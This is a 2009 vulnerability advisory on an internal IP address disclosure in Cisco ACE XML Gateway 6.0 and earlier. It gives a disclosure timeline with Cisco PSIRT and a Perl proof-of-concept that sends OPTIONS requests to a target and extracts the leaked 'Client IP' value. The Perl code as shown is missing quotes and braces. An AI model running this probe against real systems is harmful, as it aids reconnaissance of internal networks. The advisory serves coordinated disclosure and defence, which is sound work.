Cisco ACE XML Gateway <= 6.0 Internal IP disclosure

|                                 .......                                |
|                         ..xxxxxxxxxxxxxxx...                        |
|                    ..xxxxxxxxxxxxxxxxxxxxxxxxxxx..                    |
|                 ..xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.                 |
|               .xxxxxxxxxxxxxxxxxxxxxxxxxxxx........               |
|             .xxxxxxxxxxxxxxxxxxxxx......        ...  ..             |
|            .xxxxxxxxxxxxxxxxxx...         ........      ..           |
|           xxxxxxxxxxxxxxx......                          .          |
|          xxxxxxxxxxxxxx..x..                            .x.         |
|         .xxxxxxxxxxxx.....                  ...           .         |
|         xxxxxxxxx..  .                          ..        .x.        |
|         xxxxxxx.                                  ..        x.        |
|         xxxx.                ....                  x        x.        |
|         x.            ...xxxxxxx.               x       .x.        |
|         .x.         .xxxxxxxxxxxxxx.                    .         |
|          .xx.      .xxxxxxxxxxxxxxxx.           .xx.  .          |
|           .xx..    xxxxxxxxxxxxxxxx          .xxxxxxxxx.          |
|            .xx.  .xxxxxxxxxxxxxxx.      ..xxxxxxxxxxxx            |
|              .xxx.  .xxxxxxxxxxxx.    .xxxxxxxxxxxxxx.             |
|                .xxxx.xxxxxxxxx.      xxxxxxxxxxxxx.               |
|                  .xxxxxxx....          ...xxxxxxx.                  |
|                     ..xxxxx..         ..xxxxx..                     |
|                          ....xx........                          |
|                                                                        |
|                    CubilFelino Security Research Lab                   |
|                            proudly presents...                         |

Vulnerability Information
Product:        Cisco ACE XML Gateway <= 6.0
Vulnerabily:    Internal IP Address Disclosure
Vendor:	        Cisco Systems, Inc.
Product URL:
Author:         nitrØus  [ Alejandro Hernandez H. ]
Discovery Date: 24/Aug/2009
Attack Vector:  Remote
CVSS v2 Base Score: 5 (Medium) [ AV:N/AC:L/Au:N/C:P/I:N/A:N ]
Class:          I think, its a Design problem on the error messages handling

Product Information
The Cisco ACE XML Gateway is a key component of the Cisco Application Control 
Engine (ACE) family of products. It brings application intelligence into the 
network and enables efficient deployment of secure, reliable, and accelerated 
Web service environments based on XML (Extensible Markup Language) and SOAP 
(Simple Object Access Protocol) using a shared network infrastructure.

The ACE XML Gateway helps you to secure, manage, monitor, and accelerate an SOA.
In a service-oriented environment, the ACE XML Gateway acts as a service
virtualization layer. It decouples service providers from consumers, increasing 
the stability, maintainability, and flexibility of those services. It enforces 
security policies and applies business rules, such as routing decisions and 
content validation processing, across message traffic in the environment.

The ACE XML Gateway secures your SOA implementation by providing advanced XML 
firewall capabilities, with built-in protection against XML-based attacks, 
such as SQL injection or entity expansion attacks, content screening capabilities 
and more.

With a high-performance, streaming XML processing engine, the ACE XML Gateway 
reduces the performance impact of XML traffic on the network.

Vulnerability Explaination
Lets wait for the Cisco response, so, well have a better understanding on this
issue. Meanwhile...

I think this is a design error because ACE XML doesnt have in mind that the 
client could probably be in the same network segment internally, so, it receives 
the request, which cannot be processed, and throws an error message disclosing 
an internal IP address.

According to the ACE XML Gateway User Guide, Log Messages chapter, the listed 
error messages belong to different categories such as Alerts, Startup, Operational 
and Policy Errors, so, Im assuming that the OPTIONS HTTP method doesnt fit in 
none of the mentioned categories, resulting in a message explaining that theres 
no handler for this type of request which discloses an internal IP address.

Cisco PSIRT (Product Security Incident Response Team) responded by saying that the 
bug is triggered not only by the OPTIONS request. Internal IP address is included 
in response if ACE XML Gateway was not able to find a matching handler for the 
request. Also, the PSIRT verified that GET request, with a path for which no 
handler was configured, results in the same address disclosure.

Again, I think its a design error because it wasnt taken into account that the 
error message would disclose an internal IP address from the internal network.

Disclosure Timeline

24/08/2009    The vulnerability was discovered.
25/08/2009    Exploit/PoC code was developed (private).
01/09/2009    Cisco PSIRT (Product Security Incident Response Team) was 
              notificated about the issue.
02/09/2009    Vendor response asking for details of the testing environment.
02/09/2009    Test scenario explained and screenshots of the exploitation
03/09/2009    PSIRT Incident Management assing an internal tracking ID number for
              the vulnerability.
08/09/2009    The PSIRT Incident Manager took the ownership of the vulnerability.
11/09/2009    Developers confirmed the vulnerability. Code fixes and testing
              remained pending.
              Green flag given to go public whenever Id like.
17/09/2009    Fix will available in the next ACE XML Gateway release (6.1).
              PSIRT Incident Manager explained me the PSIRT response process
              followed in case of publishing the vulnerability in BugTraq,
              full-disclosure, milw0rm, packetstorm, etc.
24/09/2009    Tonight!, the vulnerability goes public and PSIRT is informed.

Exploit/PoC Code
#!/usr/bin/perl -w
# Cisco ACE XML Gateway <= 6.0
# Internal IP Address Disclosure
# -=- PRIV8 -=- 0day -=- PRIV8 -=- 0day -=- PRIV8 -=-
# -[nitrØus]-  [ Alejandro Hernandez H. ]
# nitrousenador -at- gmail -dot- com
# MexicØ / 25-Aug-2ØØ9
# -=- PUBLIC NOW -=-
# Published on September 24th, 2009

use strict;
use Socket qw/ :DEFAULT :crlf /;	# $CRLF
use IO::Socket;

sub header
	print "  .+==================================+.
	print " /     Cisco ACE XML Gateway <= 6.0     \
	print "|     Internal IP Address Disclosure     |
	print "|                                        |
	print " \             -nitr0us-                /
	print "  `+==================================+`


sub usage
	print "Usage: $0 <host> [port(default 80)]
	exit 0xdead;

my $host = shift || usage;
my $port = shift || 80;
my $axg;
my $axg_response;
my @payloads = ("OPTIONS / HTTP/1.0" . $CRLF . $CRLF, 
				"OPTIONS / HTTP/1.1" . $CRLF . "Host: " . $host . $CRLF . $CRLF);

print "[+] Connecting to $host on port $port ...

	$axg = IO::Socket::INET->new(	PeerAddr	=>	$host,
									PeerPort	=>	$port,
									Proto		=>	tcp)
		or die "[-] Could not create socket: $!

	print "[+] Sending payload  ...
	print $axg $_;

	$axg->read($axg_response, 1024);
	print "[+] Parsing response ...

	if($axg_response =~ /Client IP: (.*)/){
		print "[+] Internal IP disclosure: $1
		exit 0xbabe;


print "[-] Not vulnerable !

Wait for Cisco ACE XML Gateway 6.1 or Ciscos workaround/patch for previous 

Cisco PSIRT (Product Security Incident Response Team) guys, chr1x, ril0, crypkey, 
alt3kx, hkm, CRAc, #mendozaaaa, nediam, nahual, tr3w, darko, dex, Daemon, beck, 
ran, Héctor L., Zeus,, Bucio, etc... etc... etc...

Author Information
Author:  nitrØus  [ Alejandro Hernandez H. ]
E-mail:  nitrousenador -at- gmail -dot- com
Country: Mexico

About CubilFelino Security Research Lab
Its very peaceful (underground), but dark place in México which has a lot of 
desktop and laptop computers, (hardc0re) network hardware, wire/unwired stuff, 
some hijacked Internet connections, music gear and studio (midi controllers and 
synthesizers), Psytrance/Drum & Bass music almost always resounding the walls, 
and why not? a very very nice aquarium with river monsters: piranhas, oscar 
fish & a plecostomus. Also, its equipped with a little fridge full of munchies, 
alcohol and caffeine; with a box of cigarretes on the desktop and a lot of books 
that cant imagine about (in) security, martial-arts (yeah! we love Ninjutsu 
hacking) & programming, is the best place to do R+D for the wonderful, exciting 
& fascinating world of computers and security. Here, Hacking is sublime !